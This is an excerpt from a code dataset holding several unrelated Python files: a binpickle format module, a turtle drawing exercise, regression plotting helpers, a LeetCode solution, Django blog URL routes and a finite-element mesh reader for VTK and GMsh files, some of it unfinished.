(4 bytes, big-endian). The number of bytes in the index.\n 3. Index checksum (4 bytes, big-endian). The Adler32 checksum of the index data.\n \"\"\"\n\n offset: int\n length: int\n checksum: int\n\n def encode(self):\n \"Encode the file trailer as bytes.\"\n return TRAILER_FORMAT.pack(self.offset, self.length, self.checksum)\n\n @classmethod\n def decode(cls, buf, *, verify=True):\n \"Decode a file trailer from bytes.\"\n o, l, c = TRAILER_FORMAT.unpack(buf)\n return cls(o, l, c)\n\n\nclass IndexEntry(NamedTuple):\n \"\"\"\n Index entry for a buffer in the BinPickle index.\n \"\"\"\n offset: int\n \"The position in the file where the buffer begins (bytes).\"\n enc_length: int\n \"The encoded length of the buffer data in bytes.\"\n dec_length: int\n \"The decoded length of the buffer in bytes.\"\n checksum: int\n \"The Adler-32 checksum of the encoded buffer data.\"\n codec: tuple = None\n \"The codec used to encode the buffer, or None.\"\n\n def to_repr(self):\n \"Convert an index entry to its MsgPack-compatible representation\"\n return dict((k, getattr(self, k)) for k in self._fields)\n\n @classmethod\n def from_repr(cls, repr):\n \"Convert an index entry from its MsgPack-compatible representation\"\n if not isinstance(repr, dict):\n raise TypeError(\"IndexEntry representation must be a dict\")\n return cls(**repr)\n","sub_path":"venv/lib/python3.7/site-packages/binpickle/format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":3666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"272677905","text":"# a116_bugglength_image.plength\r\nimport turtle as trtl\r\n# instead of a descriptive name of the turtle such as painter,\r\n# a less useful variable name x is used\r\nspider = trtl.Turtle()\r\n# create spider body\r\nspider.pensize(40)\r\nspider.circle(20)\r\n# configure spider legs\r\nlegs = 4\r\nlength = 70\r\nangle = 375 / legs\r\nspider.pensize(5)\r\n# draw spider legs\r\nn = 0\r\nwhile (n < legs):\r\n spider.goto(0,20)\r\n spider.setheading(angle*n)\r\n spider.circle(50,80)\r\n spider.circle(50,-80)\r\n n = n + 1\r\nfor x in range(4):\r\n spider.goto(0,20)\r\n spider.left(20)\r\n spider.setheading(angle*n)\r\n spider.circle(-50,80)\r\n spider.circle(-50,-80)\r\n\r\nspider.backward(length)\r\nspider.right(20)\r\nspider.forward(50)\r\nspider.begin_fill()\r\nspider.circle(20)\r\nspider.end_fill()\r\nspider.hideturtle()\r\nlegsn = trtl.Screen()\r\nlegsn.mainloop()","sub_path":"KirkJ/Unit 1/1_1/1.15/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"546656044","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\n\n\ndef plotData1DHelper(X, y):\n plt.clf()\n plt.title(\"Univariate Data\")\n plt.xlabel(\"X\")\n plt.ylabel(\"y\")\n plt.plot(X, y, 'rx', label='Training Data')\n\n\ndef plotData1D(X, y):\n '''\n This function is to plot y vs X where the number of predictors of X is 1.\n Input\n X - n*1 matrix or vector of length n\n y - n*1 matrix or vector of length n\n to_block - boolean flag which when set stops the program execution until the\n plot is closed\n '''\n plotData1DHelper(X, y)\n plt.show()\n\n\ndef plotRegLine1D( lr_model, X, y):\n '''\n Plots the y vs X and also the regressed line according to the theta computed.\n Input\n X - n*2 matrix or vector of length n ( the second dimension is a column of ones for the bias term)\n y - n*1 matrix or vector of length n\n lr_model - linear regression trained model\n '''\n plotData1DHelper(X[:,1], y)\n plt.plot(X[:,1],X*lr_model.theta,'b-', label='Regression Line')\n plt.legend(loc='lower right')\n plt.show()\n\n\ndef visualizeObjective(lr_model,t1_vals,t2_vals, X, y):\n '''\n The function does the surface plot of the objective for a\n univariate regression problem with a bias term, so over 2 parameters.\n Search over the space of theta1, theta2.\n\n It also plots the gradient descent steps as blue points on the surface plot.\n Finally it plots a contour plot of the same\n\n lr_model - object of class LinReg (already trained)\n t1_vals, t2_vals - values over which the objective function should be plotted\n List of numbers\n X - n*2 matrix or vector of length n ( the second dimension is a column of ones for the bias term)\n y - n*1 matrix or vector of length n\n '''\n T1,T2 = np.meshgrid(t1_vals, t2_vals)\n n,p = T1.shape\n\n # Compute the objective function over the space\n Z = np.zeros(T1.shape)\n for i in range(n):\n for j in range(p):\n Z[i,j] = lr_model.computeCost(X,y, np.matrix([T1[i,j],T2[i,j]]).T )\n\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n surf = ax.plot_surface(T1, T2, Z, rstride=1, cstride=1, cmap=cm.coolwarm,\n linewidth=0)\n\n ax.zaxis.set_major_locator(LinearLocator(10))\n ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\n\n fig.colorbar(surf, shrink=0.5, aspect=5)\n\n # If the history of the objective function plot the path taken by the gradient descent\n if lr_model.JHist !=None:\n\n for ii in range(len(lr_model.JHist)-1):\n t1 = lr_model.JHist[ii][1].tolist()\n t2 = lr_model.JHist[ii+1][1].tolist()\n\n J1 = lr_model.JHist[ii][0]\n J2 = lr_model.JHist[ii+1][0]\n J1 = np.squeeze(np.array(J1))\n J2 = np.squeeze(np.array(J2))\n\n x_pts = [t1[0][0], t2[0][0]]\n y_pts = [t1[1][0], t2[1][0]]\n J_pts = [J1, J2]\n ax.plot3D(x_pts, y_pts, J_pts, 'b-')\n\n for J, t in lr_model.JHist:\n J = [np.squeeze(np.array(J))]\n t0 = [np.squeeze(np.array(t[0][0]))]\n t1 = [np.squeeze(np.array(t[1][0]))]\n ax.plot3D(t0, t1, J, 'mo')\n\n plt.title('Surface plot of the cost function')\n plt.xlabel('Theta0')\n plt.ylabel('Theta1')\n plt.show()\n\n # Contour plot\n plt.figure()\n plt.clf()\n CS = plt.contour(T1, T2, Z)\n plt.clabel(CS, inline=1, fontsize=10)\n plt.title('Contours of cost function')\n plt.xlabel(\"Theta0\")\n plt.ylabel(\"Theta1\")\n\n plt.plot(lr_model.theta[0][0],lr_model.theta[1][0], 'rx')\n plt.show()\n","sub_path":"plot_functions.py","file_name":"plot_functions.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"190431029","text":"class Solution:\r\n # @param {integer[]} nums\r\n # @return {integer}\r\n def maxProduct(self, nums):\r\n minv, maxv = 1, 1\r\n ret = nums[0]\r\n for n in nums:\r\n minv, maxv = min(n, maxv*n, minv*n), max(n, maxv*n, minv*n)\r\n ret = max(ret, maxv)\r\n return ret\r\n","sub_path":"MaximumProductSubarray.py","file_name":"MaximumProductSubarray.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"159831338","text":"\"\"\"myblog URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom django.conf.urls.static import static\nfrom blog import views\nimport settings\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^$',views.getIndexPage,name='Index'),\n #Specific pages get Function\n url(r'^Teclogy/$',views.getTeclogyArticle,name='TeclogyIndex'),\n url(r'^Life/$',views.getLifeArticle,name='LifeIndex'),\n\n url(r'^About/$',views.getPageByAbout,name='AboutPage'),\n url(r'^Job/$',views.getPageByJob,name='JobPage'),\n #Comment Submit Handler\n url(r'^SubmitComment/$',views.sendCommentToServer,name='CommentHanddler'),\n\n #Article Handlers\n url(r'^(?P[a-zA-Z]*)/$',views.getArticleByLable,name='GetArticleByLable'),\n url(r'^(?P[a-zA-Z]*)/(?P[\\d]*)/$',views.getArticleById,name='GetArticleById'),\n #now from zero\n url(r'^(?P[a-zA-Z]*)/(?P[\\d]*)/(?P[\\d]*)/?$',views.getArticleByPage,name='GetArticleByPage'),\n\n url(r'^Update/Display/(?P[\\d]*)/$',views.getUpdateList,name='GetUpdateList'),\n url(r'^GetByPages',views.pageArticleSendHanddler,name='PageHanddler'),\n url(r'^UploadImag3',views.ArticleImageUpload,name='ImageUpload'),\n]+ static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"myblog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"296644487","text":"## =================================================================== ##\n# this is file Model.py, created at 23-May-2013 #\n# maintained by Gustavo Rabello dos Anjos #\n# e-mail: gustavo.rabello@gmail.com #\n## =================================================================== ##\n\nimport numpy as np\nimport geometry\n\nclass Mesh:\n def __init__(_self,_boundary=None):\n \"\"\"\n Class Mesh\n \"\"\"\n _self.boundary = _boundary\n _self.numVerts = 0\n _self.numNodes = 0\n _self.numElems = 0\n _self.X = 0\n _self.Y = 0\n _self.IEN = 0\n _self.numberOfBoundaries = 0\n _self.physicalName = 0\n _self.heaviside = []\n _self.vertPhysicalName = []\n _self.elemPhysicalName = []\n _self.vertIdRegion = 0\n _self.elemIdRegion = 0\n _self.heaviside = 0\n _self.surface = 0\n _self.neighborElem = [[]]\n _self.neighborVert = [[]]\n _self.minEdge = 0\n _self.maxEdge = 0\n _self.averageEdgeLength = 0\n _self.numEdges = 0\n _self.mapEdge = 0\n _self.oface = 0\n _self.minArea = []\n _self.idMinArea = []\n _self.maxArea = []\n _self.idMaxArea = []\n _self.sumArea = []\n _self.averageTriArea = []\n\n def readVTK(_self,_dir,_filename):\n \"\"\"Read .VTK file created from any mesh generator. Assign values to\n X,Y,IEN numpy arrays.\n Ex. readVTK('/home/user/dir/','retangle.vtk')\"\"\"\n vtkFile = open(_dir+_filename,'r')\n lines = vtkFile.readlines()\n\n lineNr = 0\n while \"POINTS\" not in lines[lineNr]:\n lineNr += 1\n\n _self.numVerts = int(lines[lineNr].split()[1])\n lineNr += 1\n\n _self.X = np.zeros((_self.numVerts,1),dtype=float)\n _self.Y = np.zeros((_self.numVerts,1),dtype=float)\n\n for line in range(0,_self.numVerts):\n coords = lines[lineNr].split()\n _self.X[line] = float(coords[0])\n _self.Y[line] = float(coords[1])\n lineNr += 1\n\n while \"CELLS\" not in lines[lineNr]:\n lineNr += 1\n\n _self.numElems = int(lines[lineNr].split()[1])\n lineNr += 1\n\n _self.IEN = np.zeros((_self.numElems,3),dtype=int)\n\n for line in range(0,_self.numElems):\n vertices = lines[lineNr].split()\n v1 = int(vertices[1])\n v2 = int(vertices[2])\n v3 = int(vertices[3])\n _self.IEN[line] = [v1,v2,v3]\n lineNr += 1\n\n def readMSH(_self,_dir,_filename):\n \"\"\"Read .MSH file created from GMsh and assign values to\n X,Y,IEN numpy arrays.\n Ex. readMSH('/home/user/gmsh/','retangle.msh')\"\"\"\n mshFile = open(_dir+_filename,'r')\n lines = mshFile.readlines()\n\n lineNr = 0\n while \"$PhysicalNames\" not in lines[lineNr]:\n lineNr += 1\n\n lineNr += 1\n _self.numberOfBoundaries = int(lines[lineNr])\n\n lineNr += 1\n _self.physicalName = [[] for i in range(_self.numberOfBoundaries)]\n for line in range(0,_self.numberOfBoundaries):\n aux = lines[lineNr].split()\n _self.physicalName[line] = aux[2]\n lineNr += 1\n\n while \"$Nodes\" not in lines[lineNr]:\n lineNr += 1\n\n lineNr += 1\n _self.numVerts = int(lines[lineNr])\n\n _self.X = np.zeros((_self.numVerts,1),dtype=float)\n _self.Y = np.zeros((_self.numVerts,1),dtype=float)\n\n lineNr += 1\n for line in range(0,_self.numVerts):\n coords = lines[lineNr].split()\n _self.X[line] = float(coords[1])\n _self.Y[line] = float(coords[2])\n lineNr += 1\n\n while \"$Elements\" not in lines[lineNr]:\n lineNr += 1\n\n lineNr += 1\n totalNumElems = int(lines[lineNr])\n\n count = 0\n lineNr += 1\n while len( lines[lineNr].split() ) == 7:\n count += 1\n lineNr += 1\n\n _self.numElems = totalNumElems-count\n _self.IEN = np.zeros((_self.numElems,3),dtype=int)\n\n _self.elemIdRegion = np.zeros((_self.numElems,1),dtype=int)\n _self.elemPhysicalName = [[] for i in range(_self.numElems)]\n _self.vertIdRegion = np.zeros((_self.numVerts,1),dtype=int)\n\n for line in range(0,_self.numElems):\n vertices = lines[lineNr].split()\n v1 = int(vertices[5])-1\n v2 = int(vertices[6])-1\n v3 = int(vertices[7])-1\n _self.IEN[line] = [v1,v2,v3]\n\n lineNr += 1\n\n def mesh1Dto2D(_self,_param):\n import meshpy.triangle as tri\n\n mesh_info = tri.MeshInfo()\n mesh_info = _self.convertNumPyToTriangle(mesh_info)\n\n if _param[0] is 'Q': _param[0] = False \n else: _param[0] = True\n if _param[1] is 'A': _param[1] = True \n else: _param[1] = False\n if _param[3] is \"YY\": _param[3] = False \n else: _param[3] = True\n if _param[4] is \"q\": _param[4] = True\n else: _param[4] = False\n trimesh = tri.build(mesh_info, verbose=_param[0], \n attributes=_param[1],\n max_volume=float(_param[2]),\n allow_boundary_steiner=_param[3],\n allow_volume_steiner=_param[3], \n quality_meshing=_param[4])\n\n _self.convertTriangleToNumPy(trimesh)\n\n def convertTriangleToNumPy(_self,_trimesh):\n _self.numVerts = len(_trimesh.points)\n _self.numElems = len(_trimesh.elements)\n _self.numNodes = 0\n\n _self.IEN = np.array(_trimesh.elements)\n _self.elemIdRegion= np.zeros((_self.numElems,1),dtype=float)\n _self.vertIdRegion= np.zeros((_self.numVerts,1),dtype=float)\n _self.heaviside = np.zeros((_self.numVerts,1),dtype=float)\n for i,t in enumerate(_trimesh.elements): \n _self.elemIdRegion[i] = _trimesh.element_attributes[i]\n for j in range(0,len(t)):\n vertex = int(t[j])\n _self.vertIdRegion[vertex] = _trimesh.element_attributes[i]\n if _trimesh.element_attributes[i] == 0.0:\n _self.heaviside[vertex] = 0.0\n else:\n _self.heaviside[vertex] = 1.0\n\n coords = np.array(_trimesh.points)\n _self.X = np.array(coords[:,0])\n _self.Y = np.array(coords[:,1])\n for i,t in enumerate(_trimesh.points):\n if _trimesh.point_markers[i] == 22:\n _self.heaviside[i] = 0.5\n _self.vertIdRegion[i] = 0.5\n\n def convertNumPyToTriangle(_self,_mesh_info):\n mesh_info = _mesh_info\n\n # coords\n _self.X = _self.boundary.X.reshape(1,_self.boundary.numVerts)\n _self.Y = _self.boundary.Y.reshape(1,_self.boundary.numVerts)\n coords = np.zeros((_self.boundary.numVerts,2),dtype=float)\n coords[:,0] = _self.X\n coords[:,1] = _self.Y\n\n # point markers\n point_markers = [[] for i in range(_self.boundary.numVerts)]\n for i in range(0,_self.boundary.numVerts):\n if _self.boundary.Marker[i] == 0.0:\n point_markers[i] = 11\n elif _self.boundary.Marker[i] == 0.5:\n point_markers[i] = 22\n\n # defining bubble's surface and convex-hull\n facet_markers = [[] for i in range(_self.boundary.numElems)]\n face_markers = [[] for i in range(_self.boundary.numElems)]\n for i in range(0,_self.boundary.numElems):\n v1 = _self.boundary.IEN[i][0]\n v2 = _self.boundary.IEN[i][1]\n if (_self.boundary.Marker[v1] + _self.boundary.Marker[v2]) > 0:\n facet_markers[i] = 10\n else:\n facet_markers[i] = 20\n \n # import to mesh_info structure\n mesh_info.set_points(coords,point_markers)\n mesh_info.set_facets(_self.boundary.IEN,facet_markers)\n\n # out and in regions of bubble(s)\n # lineMesh.elemIdRegion == 0 --> wall\n # lineMesh.elemIdRegion == 1 --> bubble 1\n # lineMesh.elemIdRegion == 2 --> bubble 2 , etc\n mesh_info.regions.resize(_self.boundary.elemIdRegion.max()+1)\n for nb in range(0,_self.boundary.elemIdRegion.max()+1):\n for i in range(0,_self.boundary.numVerts):\n myList = _self.boundary.getNeighborPoint(i)\n myVec = _self.boundary.getNormalAndKappa(i,myList)\n curv = abs(myVec[0])\n if _self.boundary.vertIdRegion[i] == nb and curv < 20:\n xp = _self.boundary.X[i]\n yp = _self.boundary.Y[i]\n xNormal = myVec[1]\n yNormal = myVec[2]\n break\n mesh_info.regions[nb] = [ xp[0]-0.1*xNormal[0],\n yp[0]-0.1*yNormal[0],\n nb,\n 0.1 ]\n return mesh_info\n\n def setMiniElement(_self):\n \"\"\"Set mini element to X,Y and IEN arrays. The mini element consists in the\n same X,Y,IEN struct with an additional centroid. Therefore X,Y and IEN should\n be resized to accomadate the centroid coordinate.\n \"\"\"\n _self.numNodes = _self.numVerts + _self.numElems\n\n _self.X.resize(_self.numNodes,refcheck=False)\n _self.Y.resize(_self.numNodes,refcheck=False)\n _self.IEN = np.hstack((_self.IEN, np.zeros((_self.IEN.shape[0], 1), \\\n dtype=_self.IEN.dtype)))\n\n for i in range(0,_self.numElems):\n v1 = _self.IEN[i][0]\n v2 = _self.IEN[i][1]\n v3 = _self.IEN[i][2]\n\n vAdd = _self.numVerts + i\n\n pos = _self.IEN.shape[1]-1\n _self.IEN[i][pos] = vAdd\n centroid = geometry.getCentroid(_self.X[v1],_self.Y[v1],\n _self.X[v2],_self.Y[v2],\n _self.X[v3],_self.Y[v3] )\n\n _self.X[vAdd] = centroid[0]\n _self.Y[vAdd] = centroid[1]\n\n def setQuadElement(_self):\n \"\"\"Set quad element to X,Y and IEN arrays. The quad element consists in the\n same X,Y,IEN struct with additional edge nodes. Therefore X,Y and IEN should\n be resized to accomadate the 3 more coordinates.\n\n INCOMPLETE!\n\n \"\"\"\n _self.numNodes = _self.numVerts + _self.numEdges\n\n _self.X.resize(_self.numNodes,refcheck=False)\n _self.Y.resize(_self.numNodes,refcheck=False)\n _self.IEN = np.hstack((_self.IEN, np.zeros((_self.IEN.shape[0], 1), \\\n dtype=_self.IEN.dtype)))\n\n for i in range(0,_self.numEdges):\n edge = _self.mapEdge[i][0]\n xc = _self.mapEdge[i][1]\n yc = _self.mapEdge[i][2]\n v1 = _self.mapEdge[i][3]\n v2 = _self.mapEdge[i][4]\n\n def setNeighbor(_self):\n _self.neighborElem = [[] for i in range(_self.numVerts)]\n for i in range(0,_self.numElems):\n for j in range(0,3):\n v = _self.IEN[i][j] \n _self.neighborElem[v].append(i)\n\n def setNeighborVert(_self):\n \"\"\"\n\t Method to create neighbor vertices array for all 2D nodes.\n\t\"\"\"\n _self.neighborVert = [[] for i in range(_self.numVerts)]\n\n for i in range(0,_self.numVerts):\n elemList = _self.neighborElem[i]\n for elem in range(0,elemList):\n for j in range(0,3):\n v = _self.IEN[elem][j]\n _self.neighborVert[i].append(v)\n\n # delete i vertex at neighborVert[i]\n # MISSING METHOD\n # MISSING METHOD\n # MISSING METHOD\n # MISSING METHOD\n\n # sort and unique at neighborVert[i]\n _self.neighborVert[i] = np.unique(_self.boundary.boundaryVert[i])\n\n\n def setMapping(_self):\n \"\"\" Method to create two important mapping arrays: oFace and mapEdge\n This method also sets minEdge, maxEdge and averageEdgeLength\n \"\"\"\n\n edges = np.zeros((_self.numElems*3,4),dtype=int)\n _self.oface = -1*np.ones((_self.numElems,3),dtype=int)\n _self.boundary.boundaryVert = []\n\n for elem in range(0,_self.numElems):\n v1 = _self.IEN[elem][0]\n v2 = _self.IEN[elem][1]\n v3 = _self.IEN[elem][2]\n\n # 1st. edge\n edge1 = [v1,v2] # edge\n edge1.sort()\n edge1.append(elem) # elem\n edge1.append(2) # ID of v3\n edges[3*elem+0] = edge1\n\n # 2nd. edge\n edge2 = [v2,v3] # edge\n edge2.sort()\n edge2.append(elem) # elem\n edge2.append(0) # ID of v1\n edges[3*elem+1] = edge2\n \n # 3rd. edge\n edge3 = [v3,v1] # edge\n edge3.sort()\n edge3.append(elem) # elem\n edge3.append(1) # ID of v2\n edges[3*elem+2] = edge3\n\n # sort 2nd column and 1st column (still duplicated)\n edgesSorted = edges[np.lexsort((edges[:, 1], edges[:, 0]))]\n\n # add row (test)\n #edgesSorted = np.vstack([edgesSorted,[2,3,4,0]])\n\n i = 0\n while i < len(edgesSorted)-1:\n if edgesSorted[i][0] == edgesSorted[i+1][0] and \\\n edgesSorted[i][1] == edgesSorted[i+1][1]:\n #print 'TRUE'\n _self.oface[edgesSorted[i][2]][edgesSorted[i][3]] = edgesSorted[i+1][2]\n _self.oface[edgesSorted[i+1][2]][edgesSorted[i+1][3]] = edgesSorted[i][2]\n edgesSorted = np.delete(edgesSorted, i+1, 0)\n i += 1\n else:\n #print 'FALSE'\n _self.boundary.boundaryVert.append(edgesSorted[i][0])\n _self.boundary.boundaryVert.append(edgesSorted[i][1])\n i += 1\n \n if i == len(edgesSorted)-1:\n _self.boundary.boundaryVert.append(edgesSorted[i][0])\n _self.boundary.boundaryVert.append(edgesSorted[i][1])\n\n # sort and unique vector\n _self.boundary.boundaryVert = np.unique(_self.boundary.boundaryVert)\n\n _self.minEdge = 1E10;\n _self.maxEdge = -1E10;\n _self.mapEdge = np.zeros((len(edgesSorted),5),dtype=float)\n _self.numEdges = 0\n for i in range( 0,len(edgesSorted) ):\n x1 = _self.X[ edgesSorted[i][0] ]\n y1 = _self.Y[ edgesSorted[i][0] ]\n x2 = _self.X[ edgesSorted[i][1] ]\n y2 = _self.Y[ edgesSorted[i][1] ]\n\n xMid = (x1+x2)*0.5\n yMid = (y1+y2)*0.5\n length = geometry.vectorLength(x1-x2,y1-y2)\n\n _self.averageEdgeLength += length\n\n if( length < _self.minEdge ):\n _self.minEdge = length;\n\n if( length > _self.maxEdge ):\n _self.maxEdge = length;\n\n _self.mapEdge[_self.numEdges][0] = _self.numVerts+_self.numEdges\n _self.mapEdge[_self.numEdges][1] = xMid\n _self.mapEdge[_self.numEdges][2] = yMid\n _self.mapEdge[_self.numEdges][3] = edgesSorted[i][0] \n _self.mapEdge[_self.numEdges][4] = edgesSorted[i][1] \n _self.numEdges += 1\n\n # average of edge lenghts by total number of edges\n _self.averageEdgeLength = _self.averageEdgeLength/_self.numEdges\n\n def stats(_self):\n \"\"\"\n regular a^2 \n tri = -----\n area 2\n \"\"\"\n _self.minArea = [1E10]*(_self.elemIdRegion.max()+1)\n _self.idMinArea = [0]*(_self.elemIdRegion.max()+1)\n _self.maxArea = [-1E10]*(_self.elemIdRegion.max()+1)\n _self.idMaxArea = [0]*(_self.elemIdRegion.max()+1)\n _self.sumArea = [0]*(_self.elemIdRegion.max()+1)\n _self.averageTriArea = [0]*(_self.elemIdRegion.max()+1)\n _self.intri = [0]*(_self.elemIdRegion.max()+1)\n\n count = [0]*(_self.elemIdRegion.max()+1)\n for e in range(0,_self.numElems):\n v1 = _self.IEN[e][0]\n p1x = _self.X[v1] \n p1y = _self.Y[v1] \n\n v2 = _self.IEN[e][1]\n p2x = _self.X[v2] \n p2y = _self.Y[v2] \n\n v3 = _self.IEN[e][2]\n p3x = _self.X[v3] \n p3y = _self.Y[v3] \n\n elemID = _self.elemIdRegion[e]\n area = geometry.getArea(p1x,p1y,p2x,p2y,p3x,p3y)\n\n # intri number\n if heaviside[v1] == 0.5 and \\\n heaviside[v2] == 0.5 and \\\n heaviside[v3] == 0.5:\n intri[elemID] += 1;\n\n _self.sumArea[elemID] += area\n\n # areas\n if area < _self.minArea[elemID]:\n _self.minArea[elemID] = area\n _self.idMinArea[elemID] = e\n if area > _self.maxArea[elemID]:\n _self.maxArea[elemID] = area\n _self.idMaxArea[elemID] = e\n count[elemID] += 1\n\n for nb in range(0,_self.elemIdRegion.max()+1):\n _self.averageTriArea[nb] = _self.sumArea[nb]/count[nb]\n\n def setCloser(_self):\n nverts = len(_self.boundary.surface)\n xSurface = np.zeros((nverts,1),dtype=float)\n ySurface = np.zeros((nverts,1),dtype=float)\n for i in range(0,nverts):\n xSurface[i] = _self.boundary.X[_self.boundary.surface[i]]\n ySurface[i] = _self.boundary.Y[_self.boundary.surface[i]]\n \n # VERY SLOW ROUTINE\n # VERY SLOW ROUTINE\n # VERY SLOW ROUTINE\n # VERY SLOW ROUTINE\n closer = geometry.dsearchn(xSurface,ySurface,_self.X,_self.Y)\n\n def moveXPoints(_self,_vec,_dt):\n \"\"\"\n Move points in X direction\n\t input: velocity vector _vec and time step _dt\n\t output: mesh and boundary mesh X coordinate modified\n \"\"\"\n\n #X = X + _vec*_dt;\n for i in range(0,_self.numVerts):\n aux = _self.X[i]+(_vec[i]*_dt)\n _self.X[i] = aux\n\n for i in range(0,_self.boundary.numVerts):\n aux = _self.boundary.X[i]+(_vec[i]*_dt)\n _self.boundary.X[i] = aux\n\n\n def moveYPoints(_self,_vec,_dt):\n \"\"\"\n Move points in Y direction\n input: velocity vector _vec and time step _dt\n \t output: mesh and boundary mesh Y coordinate modified\n \"\"\"\n\n #X = X + _vec*_dt;\n for i in range(0,_self.numVerts):\n aux = _self.Y[i]+(_vec[i]*_dt)\n _self.Y[i] = aux\n\n for i in range(0,_self.boundary.numVerts):\n aux = _self.boundary.Y[i]+(_vec[i]*_dt)\n _self.boundary.Y[i] = aux\n\n def centroidPositionCorrection(_self):\n for i in range(0,_self.numElems):\n v1 = _self.IEN[i][0]\n v2 = _self.IEN[i][1]\n v3 = _self.IEN[i][2]\n v4 = _self.IEN[i][3]\n\n centroid = geometry.getCentroid(_self.X[v1],_self.Y[v1],\n _self.X[v2],_self.Y[v2],\n _self.X[v3],_self.Y[v3] )\n\n _self.X[v4] = centroid[0]\n _self.Y[v4] = centroid[1]\n\n def laplacianSmooth(_self):\n \"\"\"\n\t Defining the Laplacian Smooth operator for 2D mesh.\n\t This method moves the points according to its neighbors\n\t\"\"\"\n uSmooth = np.zeros((_self.numVerts,1),dtype=float)\n vSmooth = np.zeros((_self.numVerts,1),dtype=float)\n\n for i in range(0,_self.numVerts):\n xSum = 0\n ySum = 0\n distSum = 0\n vertList = _self.neighborVert[i] \n \n for vert in range(0,vertList):\n if vert < _self.numVerts:\n P0x = _self.X[i]\n P0y = _self.Y[i]\n P1x = _self.X[vert]\n P1y = _self.Y[vert]\n dist = geometry.distance(P0x,P0y,P1x,P1y)\n distSum = distSum + dist\n xSum = xSum + (P1x - P0x)*dist\n ySum = ySum + (P1y - P0y)*dist\n \n uSmooth[i] = (2.0/distSum)*xSum\n vSmooth[i] = (2.0/distSum)*ySum\n \n\nclass LineMesh:\n def __init__(_self):\n \"\"\"\n Class LineMesh\n \"\"\"\n _self.numVerts = 0\n _self.numNodes = 0\n _self.numElems = 0\n _self.X = 0\n _self.Y = 0\n _self.IEN = 0\n _self.numberOfBoundaries = 0\n _self.physicalName = 0\n _self.vertIdRegion = 0\n _self.elemIdRegion = 0\n _self.Marker = 0\n _self.vertPhysicalName = []\n _self.elemPhysicalName = []\n _self.neighborElem = []\n _self.minLength = []\n _self.idMinLength = []\n _self.maxLength = []\n _self.idMaxLength = []\n _self.sumLength = []\n _self.averageLineLength = []\n _self.mesh = 0\n _self.xNormal = []\n _self.yNormal = []\n _self.curvature = []\n _self.boundaryVert = []\n\n def readMSH(_self,_dir,_filename):\n \"\"\"\n Read boundary .MSH file created from GMsh and assign values to\n X,Y,IEN numpy arrays.\n Ex. readMSH('/home/user/gmsh/','retangle.msh')\n This method also selects the priority boundary conditions to be set on the\n vertPhysicalName vector. Note that only these names will be written on top of\n the others. Due to the assignment of boundary condition in the element and not\n in the vertex, a corner point may have 2 types of boundary condition,\n therefore the priority will set the correct one.\n \"\"\"\n mshFile = open(_dir+_filename,'r')\n lines = mshFile.readlines()\n\n lineNr = 0\n while \"$PhysicalNames\" not in lines[lineNr]:\n lineNr += 1\n\n lineNr += 1\n _self.numberOfBoundaries = int(lines[lineNr])\n\n lineNr += 1\n _self.physicalName = [[] for i in range(_self.numberOfBoundaries)]\n for line in range(0,_self.numberOfBoundaries):\n aux = lines[lineNr].split()\n _self.physicalName[line] = aux[2]\n lineNr += 1\n\n while \"$Elements\" not in lines[lineNr]:\n lineNr += 1\n\n lineNr += 1\n totalNumElems = int(lines[lineNr])\n\n count = 0\n lineNr += 1\n lineOld = lineNr\n while len( lines[lineNr].split() ) == 7:\n count += 1\n lineNr += 1\n\n _self.numElems = count\n _self.IEN = np.zeros((_self.numElems,2),dtype=int)\n _self.elemIdRegion = np.zeros((_self.numElems,1),dtype=int)\n _self.elemPhysicalName = [[] for i in range(_self.numElems)]\n _self.numVerts = _self.numElems\n _self.vertIdRegion = np.zeros((_self.numVerts,1),dtype=int)\n\n lineNr = lineOld\n for line in range(0,_self.numElems):\n vertices = lines[lineNr].split()\n bound = int(vertices[3])-1\n v1 = int(vertices[5])-1\n v2 = int(vertices[6])-1\n _self.IEN[line] = [v1,v2]\n\n # elemPhysicalName: numElems size\n # vector that the PhysicalName is identified (see .msh file)\n _self.elemPhysicalName[line] = _self.physicalName[bound][1:-1]\n \n # vertIdRegion and elemIdRegion: 0 for all wall types and 1,2,3... for\n # bubbles or drops\n if 'wall' in _self.physicalName[bound]:\n _self.vertIdRegion[v1] = 0\n _self.vertIdRegion[v2] = 0\n _self.elemIdRegion[line] = 0\n else:\n _self.vertIdRegion[v1] = _self.physicalName[bound][7:-1] # 'bubble1' -> 1\n _self.vertIdRegion[v2] = _self.physicalName[bound][7:-1] # 'bubble10 -> 10\n _self.elemIdRegion[line] = _self.physicalName[bound][7:-1]\n\n lineNr += 1\n\n lineNr = 0\n while \"$Nodes\" not in lines[lineNr]:\n lineNr += 1\n\n _self.X = np.zeros((_self.numVerts,1),dtype=float)\n _self.Y = np.zeros((_self.numVerts,1),dtype=float)\n\n lineNr += 2\n for line in range(0,_self.numVerts):\n coords = lines[lineNr].split()\n _self.X[line] = float(coords[1])\n 